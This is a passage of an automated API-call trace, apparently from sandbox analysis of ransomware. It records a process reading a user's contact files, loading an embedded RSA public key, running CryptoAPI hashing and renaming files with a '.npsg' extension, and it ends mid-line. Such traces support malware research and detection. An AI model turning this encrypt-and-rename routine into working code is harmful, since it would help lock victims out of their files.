[0235.313] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.313] GetTickCount () returned 0x1140e24 [0235.313] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.314] GetTickCount () returned 0x1140e24 [0235.314] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.315] GetTickCount () returned 0x1140e24 [0235.315] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.316] GetTickCount () returned 0x1140e24 [0235.316] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.317] GetTickCount () returned 0x1140e24 [0235.317] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.317] GetTickCount () returned 0x1140e24 [0235.317] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.318] GetTickCount () returned 0x1140e34 [0235.318] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.319] GetTickCount () returned 0x1140e34 [0235.319] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.320] GetTickCount () returned 0x1140e34 [0235.320] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.321] GetTickCount () returned 0x1140e34 [0235.321] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.321] GetTickCount () returned 0x1140e34 [0235.382] FreeLibrary (hLibModule=0x77010000) returned 1 [0235.382] QueryPerformanceCounter (in: lpPerformanceCount=0x39aefa4 | out: lpPerformanceCount=0x39aefa4*=14329573595) returned 1 [0235.382] GlobalMemoryStatus (in: lpBuffer=0x39af414 | out: lpBuffer=0x39af414) [0235.391] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.428] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0235.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0235.449] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.449] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0235.449] CloseHandle (hObject=0x644) returned 1 [0235.451] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.npsg")) returned 1 [0235.456] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0235.466] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned=".contact" [0235.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0235.478] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=68382) returned 1 [0235.478] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0235.481] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.481] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0235.580] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0235.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.599] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0235.602] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0235.602] CryptHashData (hHash=0x33f0408, pbData=0x6962b0, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0235.602] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0235.602] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0235.614] GetLastError () returned 0x0 [0235.625] SetLastError (dwErrCode=0x0) [0235.625] GetLastError () returned 0x0 [0235.625] SetLastError (dwErrCode=0x0) [0235.648] GetLastError () returned 0x0 [0235.648] SetLastError (dwErrCode=0x0) [0235.648] GetLastError () returned 0x0 [0235.648] SetLastError (dwErrCode=0x0) [0235.648] GetLastError () returned 0x0 [0235.648] SetLastError (dwErrCode=0x0) [0235.648] GetLastError () returned 0x0 [0235.648] SetLastError (dwErrCode=0x0) [0235.648] GetLastError () returned 0x0 [0235.648] SetLastError (dwErrCode=0x0) [0235.648] GetLastError () returned 0x0 [0235.648] SetLastError (dwErrCode=0x0) [0235.648] GetLastError () returned 0x0 [0235.648] SetLastError (dwErrCode=0x0) [0235.648] GetLastError () returned 0x0 [0235.648] SetLastError (dwErrCode=0x0) [0235.648] GetLastError () returned 0x0 [0235.648] SetLastError (dwErrCode=0x0) [0235.648] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0235.649] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] GetLastError () returned 0x0 [0235.649] SetLastError (dwErrCode=0x0) [0235.649] GetLastError () returned 0x0 [0235.650] SetLastError (dwErrCode=0x0) [0235.650] GetLastError () returned 0x0 [0235.650] SetLastError (dwErrCode=0x0) [0235.650] GetLastError () returned 0x0 [0235.650] SetLastError (dwErrCode=0x0) [0235.650] GetLastError () returned 0x0 [0235.650] SetLastError (dwErrCode=0x0) [0235.650] GetLastError () returned 0x0 [0235.650] SetLastError (dwErrCode=0x0) [0235.650] GetLastError () returned 0x0 [0235.650] SetLastError (dwErrCode=0x0) [0235.650] GetLastError () returned 0x0 [0235.650] SetLastError (dwErrCode=0x0) [0235.650] GetLastError () returned 0x0 [0235.650] SetLastError (dwErrCode=0x0) [0235.650] GetLastError () returned 0x0 [0235.650] SetLastError (dwErrCode=0x0) [0235.650] GetLastError () returned 0x0 [0235.650] SetLastError (dwErrCode=0x0) [0235.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0235.650] CryptDestroyHash (hHash=0x33f0408) returned 1 [0235.650] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0235.651] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0235.651] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0235.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0235.651] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0235.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffee8 [0235.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff18 [0235.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff30 [0235.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0235.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x64dd08 [0235.697] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x3b7a060 [0235.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b907f8 [0235.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffee8 | out: hHeap=0x620000) returned 1 [0235.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff30 | out: hHeap=0x620000) returned 1 [0235.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff18 | out: hHeap=0x620000) returned 1 [0235.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0235.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b907f8 | out: hHeap=0x620000) returned 1 [0235.750] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff18 [0235.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0235.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff30 [0235.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0235.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x33ffee8 [0235.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0235.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x33b8188 [0235.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0235.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0235.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0235.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0235.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0235.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0235.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0235.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff30 | out: hHeap=0x620000) returned 1 [0235.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0235.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffee8 | out: hHeap=0x620000) returned 1 [0235.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0235.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0235.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff18 | out: hHeap=0x620000) returned 1 [0235.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0235.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0235.820] GetCurrentThreadId () returned 0x5b4 [0235.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0235.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x687c10 [0235.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0235.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0235.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0235.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0235.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0235.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0235.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.821] GetCurrentThreadId () returned 0x5b4 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0235.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff18 [0235.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0235.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffee8 [0235.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0235.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff30 [0235.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0235.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffed0 [0235.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff48 [0235.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0235.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffc0 [0235.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffea0 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff60 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffea0 | out: hHeap=0x620000) returned 1 [0235.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33ffea0 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffc0 | out: hHeap=0x620000) returned 1 [0235.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0235.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffee8 | out: hHeap=0x620000) returned 1 [0235.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33ffee8 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0235.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff18 | out: hHeap=0x620000) returned 1 [0235.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff60 | out: hHeap=0x620000) returned 1 [0235.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b7a060 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x64dd08 [0235.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0235.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffee8 | out: hHeap=0x620000) returned 1 [0235.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a278 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0235.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a278 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffea0 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff48 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0235.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff30 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffed0 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff00 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7cb0 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0235.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: 